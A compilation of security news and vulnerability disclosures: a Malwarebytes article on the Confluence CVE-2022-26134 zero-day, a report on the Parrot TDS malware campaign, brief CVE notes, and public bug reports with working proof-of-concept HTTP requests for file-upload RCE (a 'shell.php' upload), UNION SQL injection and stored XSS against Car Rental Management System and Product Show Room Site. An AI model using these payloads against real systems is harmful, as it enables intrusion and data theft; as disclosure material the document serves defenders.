A vulnerability in Atlassian Confluence was found by performing an incident response investigation on a compromised server. The vulnerability is not yet patched.
The post Unpatched Atlassian Confluence vulnerability is actively exploited appeared first on Malwarebytes Labs.

Researchers found a vulnerability in Atlassian Confluence by conducting an incident response investigation. Atlassian rates the severity level of this vulnerability as critical.

Atlassian has issued a security advisory and is working on a fix for the affected products. This qualifies the vulnerability as an actively exploited in the wild zero-day vulnerability.

Publicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). This vulnerability is listed as CVE-2022-26134.

**Confluence**

Atlassian Confluence is a collaboration tool in wiki style. Confluence is a team collaboration platform that connects teams with the content, knowledge, and their co-workers, which helps them find all the relevant information in one place. Teams use it to work together on projects and share knowledge.

Confluence Server is the on-premises version which is being phased out. Confluence Data Center is the self-managed enterprise edition of Confluence.

**The vulnerability**

The description of CVE-2022-26134 says it is a critical unauthenticated remote code execution vulnerability in Confluence Server and Confluence Data Center.

During the investigation, the researchers found JSP web shells written to disk. JSP (Jakarta Server Pages or Java Server Pages) is a server-side programming technology that helps software developers create dynamically generated web pages based on HTML, XML, SOAP, or other document types. JSP is similar to PHP and ASP, but uses the Java programming language.

It became clear that the server compromise stemmed from an attacker launching an exploit to achieve remote code execution. The researchers were able to recreate that exploit and identify a zero-day vulnerability impacting fully up-to-date versions of Confluence Server.

After the researchers contacted Atlassian, Atlassian confirmed the vulnerability and subsequently assigned the issue to CVE-2022-26134. It confirmed the vulnerability works on current versions of Confluence Server and Data Center.

**The attack**

The researchers at Volexity were unwilling to provide any details about the attack method since there is no patch available for this vulnerability. However, they were able to provide some details about the shells that were dropped by exploiting the vulnerability.

A web shell is a a malicious script used by an attacker that allows them to escalate and maintain persistent access on an already compromised web application. (Not every web shell is malicious, but the non-malicious ones are not interesting to us in this context.)

This web shell was identified as the China Chopper web shell. The China Chopper web shell is commonly used by malicious Chinese actors, including advanced persistent threat (APT) groups, to remotely control web servers. The web shell has two parts, the client interface  and the small (4 kilobytes in size) receiver host file on the compromised web server. But access logs seemed to indicate that the China Chopper web only served as a means of secondary access.

On further investigation they found bash shells being launched by the Confluence web application process. This stood out because it had spawned a bash process which spawned a Python process that in turn spawned a bash shell. Bash is the default shell for many Linux distros and is short for the GNU Bourne-Again Shell.

Research showed that the web server process as well as the child processes created by the exploit were all running as root (with full privileges) user and group. These types of vulnerabilities are dangerous, as it allows attackers to execute commands and gain full control of a vulnerable system. They can even do this without valid credentials as long as it is possible to make web requests to the Confluence system.

After successfully exploiting the Confluence Server systems, the attacker immediately deployed an in-memory copy of the BEHINDER implant. BEHINDER provides very powerful capabilities to attackers, including memory-only web shells and built-in support for interaction with Meterpreter and Cobalt Strike.

**Mitigation**

There are currently no fixed versions of Confluence Server and Data Center available. In the interim, users should work with their security team to consider the best course of action. Options to consider include:

*   Restricting access to Confluence Server and Data Center instances from the internet.
*   Disabling Confluence Server and Data Center instances.
*   If you are unable to take the above actions, implementing a WAF (Web Application Firewall) rule which blocks URLs containing **${** may reduce your risk.

_Note: **${** is the first part of a parameter substitution in a shell script_

**Affected versions**

All supported versions of Confluence Server and Data Center are affected. And according to Atlassian it’s likely that **all** versions of Confluence Server and Data Center are affected, but they are still investigating and have yet to confirm the earliest affected version.

One important exception: if you access your Confluence site via an atlassian.net domain. This means it is hosted by Atlassian and is not vulnerable.

We will keep you posted about the developments, so stay tuned.

Unpatched Atlassian Confluence vulnerability is actively exploited

The Parrot traffic direction system (TDS) that came to light earlier this year has had a larger impact than previously thought, according to new research.
Sucuri, which has been tracking the same campaign since February 2019 under the name "NDSW/NDSX," said that "the malware was one of the top infections" detected in 2021, accounting for more than 61,000 websites.
Parrot TDS was documented in

The Parrot traffic direction system (TDS) that came to light earlier this year has had a larger impact than previously thought, according to new research.

Sucuri, which has been tracking the same campaign since February 2019 under the name "NDSW/NDSX," said that "the malware was one of the top infections" detected in 2021, accounting for more than 61,000 websites.

Parrot TDS was documented in April 2022 by Czech cybersecurity company Avast, noting that the PHP script had ensnared web servers hosting more than 16,500 websites to act as a gateway for further attack campaigns.

This involves appending a piece of malicious code to all JavaScript files on compromised web servers hosting content management systems (CMS) such as WordPress that are in turn said to be breached by taking advantage of weak login credentials and vulnerable plugins.

Besides using different obfuscation tactics to conceal the code, the "injected JavaScript may also be found well indented so that it looks less suspicious to a casual observer," Sucuri researcher Denis Sinegubko said.

JavaScript variant using the ndsj variable

The goal of the JavaScript code is to kick-start the second phase of the attack, which is to execute a PHP script that's already deployed on the ever and is designed to gather information about a site visitor (e.g., IP address, referrer, browser, etc.) and transmit the details to a remote server.

Typical obfuscated PHP malware found in NDSW campaign

The third layer of the attack arrives in the form of a JavaScript code from the server, which acts as a traffic direction system to decide the exact payload to deliver for a specific user based on the information shared in the previous step.

"Once the TDS has verified the eligibility of a specific site visitor, the NDSX script loads the final payload from a third-party website," Sinegubko said. The most commonly used third-stage malware is a JavaScript downloader named FakeUpdates (aka SocGholish).

In 2021 alone, Sucuri said it removed Parrot TDS from nearly 20 million JavaScript files found on infected sites. In the first five months of 2022, over 2,900 PHP and 1.64 million JavaScript files have been observed containing the malware.

"The NDSW malware campaign is extremely successful because it uses a versatile exploitation toolkit that constantly adds new disclosed and 0-day vulnerabilities," Sinegubko explained.

"Once the bad actor has gained unauthorized access to the environment, they add various backdoors and CMS admin users to maintain access to the compromised website long after the original vulnerability is closed."

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Researchers Uncover Malware Controlling Thousands of Sites in Parrot TDS Network

net/netfilter/nf_tables_api.c in the Linux kernel through 5.18.1 allows a local user (able to create user/net namespaces) to escalate privileges to root because an incorrect NFT_STATEFUL_EXPR check leads to a use-after-free.

CVE-2022-32250: security - Linux Kernel use-after-free write in netfilter

Caddy v2.4 was discovered to contain an open redirect vulnerability. A remote unauthenticated attacker may exploit this vulnerability to redirect users to arbitrary web URLs by tricking the victim users to click on crafted links.

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Conversation 1 Commits 1 Checks 20 Files changed

**Conversation**

This is a followup to #4407, in response to a report on the forums: https://caddy.community/t/php-fastcgi-phishing-redirection/14542

Turns out that doing TrimRight to remove trailing dots, _before_ cleaning the path, will cause double-dots at the end of the path to not be cleaned away as they should. We should instead remove the dots _after_ cleaning.

This is a followup to #4407, in response to a report on the forums: https://caddy.community/t/php-fastcgi-phishing-redirection/14542

Turns out that doing \`TrimRight\` to remove trailing dots, \_before\_ cleaning the path, will cause double-dots at the end of the path to not be cleaned away as they should. We should instead remove the dots \_after\_ cleaning.

Copy link

Member

** **mholt** left a comment**

Ah, nice. Simple and elegant fix, LGTM. Thank you

nordstern pushed a commit to uptimerobot/caddy that referenced this issue

Jan 24, 2022

2 participants

CVE-2022-29718: caddyhttp: Fix `MatchPath` sanitizing by francislavoie · Pull Request #4499 · caddyserver/caddy

Car Rental Management System v1.0 is vulnerable to Arbitrary code execution via car-rental-management-system/admin/ajax.php?action=save_car.

Permalink

Cannot retrieve contributors at this time

**Car Rental Management System v1.0 has arbitrary code execution (RCE)**

vendor: https://www.campcodes.com/projects/php/car-rental-management-system/

Vulnerability url: ip/car-rental-management-system/admin/ajax.php?action=save\_car

Request package for file upload：

POST /car\-rental\-management\-system/admin/ajax.php?action\=save\_car HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: \*/\*
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.19/car-rental-management-system/admin/index.php?page=manage\_car&id=6
Content-Length: 1107
Content-Type: multipart/form-data; boundary=---------------------------16501296121152
Cookie: PHPSESSID=q0aiu0hqk51vrl4kivubc7u18k
Connection: close
\-----------------------------16501296121152
Content-Disposition: form-data; name="id"
6
\-----------------------------16501296121152
Content-Disposition: form-data; name="brand"
1
\-----------------------------16501296121152
Content-Disposition: form-data; name="model"
1
\-----------------------------16501296121152
Content-Disposition: form-data; name="category\_id"
6
\-----------------------------16501296121152
Content-Disposition: form-data; name="engine\_id"
3
\-----------------------------16501296121152
Content-Disposition: form-data; name="transmission\_id"
3
\-----------------------------16501296121152
Content-Disposition: form-data; name="description"
111
\-----------------------------16501296121152
Content-Disposition: form-data; name="price"
10
\-----------------------------16501296121152
Content-Disposition: form-data; name="qty"
110
\-----------------------------16501296121152
Content-Disposition: form-data; name="img"; filename="shell.php"
Content-Type: application/pdf
JFJF
<?php phpinfo();?>
\-----------------------------16501296121152--

The files will be uploaded to this directory \\admin\\assets\\uploads\\cars\_img  

We visited the directory of the file in the browser and found that the code had been executed

CVE-2022-32019: bug_report/RCE-1.md at main · k0xx11/bug_report

A vulnerability was found in SourceCodester Product Show Room Site 1.0. It has been declared as problematic. This vulnerability affects p=contact. The manipulation of the Message textbox with the input <script>alert(1)</script> leads to cross site scripting. The attack can be initiated remotely but requires authentication. Exploit details have been disclosed to the public.

**Product Show Room Site - 'Message' Stored Cross-Site Scripting(XSS)****Exploit Title: Product Show Room Site - 'Message' Stored Cross-Site Scripting(XSS)****Exploit Author: webraybtl@webray.com.cn inc****Vendor Homepage: https://www.sourcecodester.com/php/15370/product-show-room-site-phpoop-free-source-code.html****Software Link: https://www.sourcecodester.com/download-code?nid=15370&title=Product+Show+Room+Site+in+PHP%2FOOP+Free+Source+Code****Version: Product Show Room Site 1.0****Tested on: Windows Server 2008 R2 Enterprise, Apache ,Mysql****Description**

Persistent XSS (or Stored XSS) attack is one of the three major categories of XSS attacks, the others being Non-Persistent (or Reflected) XSS and DOM-based XSS. In general, XSS attacks are based on the victim’s trust in a legitimate, but vulnerable, website or web application.Product Show Room Site does not filter the content correctly at the "Contact info-Telephone" module, resulting in the generation of stored XSS.

**Payload used:**

<script>alert(111)</script>

**Proof of Concept**

1.  Login the CMS. Default Admin Access Username: admin Password: admin123
    
2.  Open Page http://172.24.5.107/psrs/?p=contact
    
3.  Put XSS payload (<script>alert(111)</script>) in the Message box and click on Send Message to publish the page  
    
4.  Open http://172.24.5.107/psrs/admin/?page=inquiries,Viewing the Top 1 of Inquiries page,We can see the alert.

CVE-2022-1979: webray.com.cn/'Message' Stored Cross-Site Scripting(XSS).md at main · Xor-Gerke/webray.com.cn

Car Rental Management System v1.0 is vulnerable to SQL Injection via /car-rental-management-system/admin/manage_user.php?id=.

Permalink

Cannot retrieve contributors at this time

**Car Rental Management System v1.0 has SQL injection**

The password for the backend login account is: admin/admin123

vendors: https://www.campcodes.com/projects/php/car-rental-management-system/

Vulnerability File: /car-rental-management-system/admin/manage\_user.php?id=

Vulnerability location: /car-rental-management-system/admin/manage\_user.php?id=,id

\[+\] Payload: /car-rental-management-system/admin/manage\_user.php?id=-1%20union%20select%201,database(),3,4,5--+ // Leak place ---> id

Current database name: car\_rental\_db

GET /car\-rental\-management\-system/admin/manage\_user.php?id\=\-1%20union%20select%201,database(),3,4,5\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=q0aiu0hqk51vrl4kivubc7u18k
Connection: close

CVE-2022-32028: bug_report/SQLi-8.md at main · k0xx11/bug_report

Car Rental Management System v1.0 is vulnerable to SQL Injection via /car-rental-management-system/admin/index.php?page=manage_car&id=.

**Car Rental Management System v1.0 has SQL injection**

The password for the backend login account is: admin/admin123

vendors: https://www.campcodes.com/projects/php/car-rental-management-system/

Vulnerability File: /car-rental-management-system/admin/index.php?page=manage\_car&id=

Vulnerability location: /car-rental-management-system/admin/index.php?page=manage\_car&id=,id

\[+\] Payload: /car-rental-management-system/admin/index.php?page=manage\_car&id=-6%20union%20select%201,2,database(),4,5,6,7,8,9,10--+ // Leak place ---> id

Current database name: car\_rental\_db

GET /car\-rental\-management\-system/admin/index.php?page\=manage\_car&id\=\-6%20union%20select%201,2,database(),4,5,6,7,8,9,10\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=q0aiu0hqk51vrl4kivubc7u18k
Connection: close

CVE-2022-32027: bug_report/SQLi-7.md at main · k0xx11/bug_report

Car Rental Management System v1.0 is vulnerable to SQL Injection via /car-rental-management-system/admin/manage_booking.php?id=.

**Car Rental Management System v1.0 has SQL injection**

The password for the backend login account is: admin/admin123

vendors: https://www.campcodes.com/projects/php/car-rental-management-system/

Vulnerability File: /car-rental-management-system/admin/manage\_booking.php?id=

Vulnerability location: /car-rental-management-system/admin/manage\_booking.php?id=,id

\[+\] Payload: /car-rental-management-system/admin/manage\_booking.php?id=-1%20union%20select%201,2,3,4,5,6,database(),8,9,10,11--+ // Leak place ---> id

Current database name: car\_rental\_db

GET /car\-rental\-management\-system/admin/manage\_booking.php?id\=\-1%20union%20select%201,2,3,4,5,6,database(),8,9,10,11\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=q0aiu0hqk51vrl4kivubc7u18k
Connection: close

CVE-2022-32026: bug_report/SQLi-5.md at main · k0xx11/bug_report

Car Rental Management System v1.0 is vulnerable to SQL Injection via /car-rental-management-system/admin/manage_movement.php?id=.

**Car Rental Management System v1.0 has SQL injection**

The password for the backend login account is: admin/admin123

vendors: https://www.campcodes.com/projects/php/car-rental-management-system/

Vulnerability File: /car-rental-management-system/admin/manage\_movement.php?id=

Vulnerability location: /car-rental-management-system/admin/manage\_movement.php?id=,id

\[+\] Payload: /car-rental-management-system/admin/manage\_movement.php?id=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,database(),16,17--+ // Leak place ---> id

Current database name: car\_rental\_db

GET /car\-rental\-management\-system/admin/manage\_movement.php?id\=\-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,database(),16,17\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=q0aiu0hqk51vrl4kivubc7u18k
Connection: close

Tag

#php